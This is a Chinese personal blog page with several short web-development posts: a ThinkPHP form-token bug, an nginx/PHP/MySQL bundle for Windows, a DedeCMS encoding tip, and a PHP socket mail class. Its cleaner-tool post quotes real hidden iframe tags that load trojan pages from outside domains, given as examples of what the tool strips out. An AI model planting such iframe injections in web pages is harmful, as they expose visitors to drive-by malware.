扬帆在线工具集
作者:webfly 日期:2007-09-30
一个想不到的原因引起的Thinkphp表单令牌验证出错
作者:webfly 日期:2010-08-13
|
版权声明:原创作品,谢绝转载!否则将追究法律责任。
|
|
今天写一个小程序,结果遇到一个错误,提示表单令牌验证出错,尝试了好多办法也不行,搜索网络也找不到好的解决办法,又不想直接屏蔽掉这个功能,屏蔽掉会不安全的。用httpwatch抓包结果发现(图中红色标注)
由于有2个图片地址错误,导致多次加载了表单页面,从而导致了表单令牌验证的session值发生了变化,所以出现表单令牌验证错误提示,把图片地址改正以后,世界清静了,也算是Thinkphp的一个小bug吧~~
以下是官方手册对于令牌验证的解释:
==================================
令牌验证
ThinkPHP新版内置了表单令牌验证功能,可以有效防止表单的远程提交等安全防护。
表单令牌验证相关的配置参数有:
'TOKEN_ON'=>true, // 是否开启令牌验证
'TOKEN_NAME'=>'__hash__', // 令牌验证的表单隐藏字段名称
'TOKEN_TYPE'=>'md5', //令牌哈希验证规则默认为MD5
如果开启表单令牌验证功能,系统会自动在带有表单的模板文件里面自动生成以TOKEN_NAME为名称的隐藏域,其值则是TOKEN_TYPE方式生成的哈希字符串,用于实现表单的自动令牌验证。
自动生成的隐藏域位于表单Form结束标志之前,如果希望自己控制隐藏域的位置,可以手动在表单页面添加{__TOKEN__} 标识,系统会在输出模板的时候自动替换。如果在开启表单令牌验证的情况下,个别表单不需要使用令牌验证功能,可以在表单页面添加{__NOTOKEN__},则系统会忽略当前表单的令牌验证。
如果页面中存在多个表单,建议添加{__TOKEN__}标识,并确保只有一个表单需要令牌验证。
模型类在创建数据对象的同时会自动进行表单令牌验证操作,如果你没有使用create方法创建数据对象的话,则需要手动调用模型的autoCheckToken方法进行表单令牌验证。如果返回false,则表示表单令牌验证错误。例如:
$User = M("User"); // 实例化User对象
// 手动进行令牌验证
if (!$User->autoCheckToken($_POST)){
// 令牌验证错误
}
|
扬帆nginx套装-使用nginx For Windows最新版制作(2009-12-01)
作者:webfly 日期:2009-08-05
本套装包含以下内容:
Nginx/0.8.29 (Nginx change log)
Php 5.2.9-2
Mysql5.0.51a 默认用户名:root 默认密码:123456
Zend Optimizer v3.3.3
eAccelerator v0.9.5.3
PhpMyadmin 3.1.1
说明:
1 请解压到非中文目录下,然后点击RunMonitor.exe运行,
退出主程序会自动关闭服务,可以将RunMonitor.exe最小化
如果nginx运行失败 请检查本机80端口是否被iis、apache或者迅雷等占用
Tags: nginx套装 PHP Mysql ZendOptimizer eaccelerator
DeDeCms标签中utf8转gb2312
作者:webfly 日期:2009-05-28
文章转载请注明出自扬帆blog http://www.wesoho.com
遇到一个特殊的应用,utf8版本的dedecms,使用iframe包含了一个页面,是gb2312编码的,这样使用arclist标签的时候出来的是乱码,这样就需要输出的时候转换一下。
解决办法如下:
[field:title function='iconv("UTF-8","gb2312//IGNORE","@me")'/]
ifraMe大小写变形、script网马清理器(2008.08.17更新)
作者:webfly 日期:2008-02-13
声明:ifraMe大小写变形、script网马清理器是由扬帆独立开发,作者免费发布供广大站长朋友使用,保留版权。扬帆blog为唯一官方网站,除此站点下载的文件有可能被捆绑木马,请认准官方网站,下载最新版本。另外作者开发软件,纯属公益性质,原则上不提供任何技术支持,对软件使用过程中发生的任何损失均不负责,禁止任何人以任何形式修改此软件。转载此软件请注明作者和本页连接,谢谢合作。
下午看到一个帖子,有人问 “最变态的网页挂马方式,大家来看怎么处理”
http://www.im286.com/viewthread.php?tid=2370947&pid=23909560&page=1&extra=page%3D1#pid23909560
看了一下是iframe大小写混合变形的马,类似这种形式
<iframe src=http://pr.749571.com/ww/new05.htm?013 width=1 height=1></iframe>
<Iframe src=http://aaa.77xxmm.cn/new858.htm?075 wiDth=0 name='8411' hEight=0></iframE><iframE src=hTTp://aaa.1l1l1l.com/error/404.hTml widTh=0 name='8411' HeigHt=0></iframe>
想了想写了个小工具,提供给落伍各位站长用,刚写完没怎么测试,有什么bug大家给我反馈下~谢谢
使用说明:
本软件专门清理iframe大小写混合网页马,比如要清理掉以下内容:
<ifraMe src=http://aaa.77xxmm.cn/new858.htm?075 width=0 nAme='5302'
height=0></ifrAme>
<iframe src=http://ppp.749571.com/ww/new05.htm?013 width=1 height=1></iframe>
网页木马关键词:77xxmm.cn,然后点搜索,搜索完毕后点清理木马
一个关键词清理完了,可以换个关键词:749571.com,再点清理木马
更新了一个版本:最新版支持iframe大小写木马,script形式挂马清,理默认后缀增加了php和inc,本次提供的是
【推荐】武术视频收集
作者:webfly 日期:2008-01-24
【php】用Socket发送电子邮件修正版(测试163可成功发送)
作者:webfly 日期:2008-01-21
smtp_mail.php
<?php
/*
如果转载请注明处出,您可以对此代码进行一定的修改和优化以达到您需要的目的
* 名称:用Socket发送电子邮件
* 描述:本类实现了直接使用需要验证的SMTP服务器直接发送邮件,参考文章《用Socket发送电子邮件》作者:limodou
* 此文章比较早,他是用不用验证SMTP服务器发送邮件,现在基本上SMTP服务器都需要验证了,所以这个文章里的类
不是很大!同时参考了RFC 1869]和PHP手册!!和上文还有不同的是我用的不是fsockopen()函数
具体你自己看吧!!我刚刚测试通过了,很爽!!
其实把这个类再改写一下就可以直接发送带附件的邮件了,期待。。。我过几天给大家写出来!
我刚刚调试通过,如果你不恶意去捉弄这个程序,他还是很听话的,过些日子我会对他完善加上发送附件的功能!!
即使你的虚拟主机不支持MAIL函数,现在也不怕了!快快试试这个吧!
